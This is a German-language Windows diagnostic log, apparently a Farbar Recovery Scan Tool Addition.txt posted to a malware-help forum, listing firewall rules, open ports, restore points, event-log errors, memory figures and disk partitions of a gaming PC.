FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{27DA54EA-7C9B-4B97-96C6-942F80047372}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{78F6F092-69FD-4D36-922F-1CE3D31835A1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C2CDA1DC-8DE3-45A6-94B3-F0706241CBD8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe
FirewallRules: [{B6E395BA-E7C0-4F0F-9AC2-27524731F328}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{7CC665E9-63CB-4739-8C40-0F18A0FF24D5}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{3A2DD2AC-B60D-47B7-885A-C75AB3598542}] => (Allow) C:\Program Files (x86)\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{E2F272A9-9C2D-4153-A6E8-B0CA7DEC952E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{580F9D58-147D-49C8-8860-72B82CBFB810}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\tbs2\win32\The Banner Saga 2.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{88E2825B-75D6-4FA2-9C1B-2860CC650742}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{D310D4B3-D134-4238-B418-B4DE564E9A7A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DevTools\DyingLightPlayer.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{655103CF-CF71-4333-B671-2AB29537C58B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A98E4A31-D7CC-4141-8318-5666E0BE2FBF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C957F22E-1F7B-4C1A-80E1-F7CDA0A136D7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{DE2FAC41-C0B2-4FBB-B0E2-260817A7AA70}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
FirewallRules: [{CD214533-670D-4629-ACF1-B4900817F6E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{9CE093E1-63AA-46F8-944A-5818E43AABF5}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DBDownloader.exe
FirewallRules: [{965847FA-3EC0-4CDC-B5B3-DA17E209E3EA}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
FirewallRules: [{35A6D9BD-B597-4C06-9393-8455B22E6389}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\4.4.0\AutoUpdate.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

24-07-2017 18:17:25 Avira System Speedup Optimierung
31-07-2017 01:36:50 Removed simplitec simplicheck
01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/01/2017 11:58:55 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/01/2017 03:56:53 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "18344". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.

Error: (08/01/2017 03:56:53 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "18344". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.

Error: (08/01/2017 02:22:16 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/01/2017 02:11:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.15063.447, Zeitstempel: 0x5948acf2
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 10.0.15063.483, Zeitstempel: 0x1b3f5968
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000077bd2
ID des fehlerhaften Prozesses: 0x2264
Startzeit der fehlerhaften Anwendung: 0x01d30a5aa80784e4
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
Berichtskennung: ba034c06-b31b-4616-a727-834271c8bc89
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

Error: (07/31/2017 08:55:58 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (07/31/2017 08:36:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MicrosoftEdge.exe, Version: 11.0.15063.447, Zeitstempel: 0x5948acf2
Name des fehlerhaften Moduls: CoreUIComponents.dll, Version: 10.0.15063.483, Zeitstempel: 0x1b3f5968
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000077bd2
ID des fehlerhaften Prozesses: 0xfe4
Startzeit der fehlerhaften Anwendung: 0x01d30a2bdb590385
Pfad der fehlerhaften Anwendung: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
Berichtskennung: 2a5c4221-e13a-4d9c-9167-16130416246f
Vollständiger Name des fehlerhaften Pakets: Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: MicrosoftEdge

Error: (07/31/2017 08:18:31 PM) (Source: IObitLiveUpdate.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/31/2017 08:05:46 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (07/31/2017 08:05:37 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.
         

Alt 01.08.2017, 15:51   #15
Lost_Viking
 



<<<<<< Since the Addition file had too many characters, here is the rest


Code:
ATTFilter
Systemfehler:
=============
Error: (08/01/2017 12:57:41 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 und der APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (08/01/2017 12:32:03 PM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/01/2017 12:32:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 49%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 8160.43 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 6920.27 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:62 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.74 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2639.82 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================
         
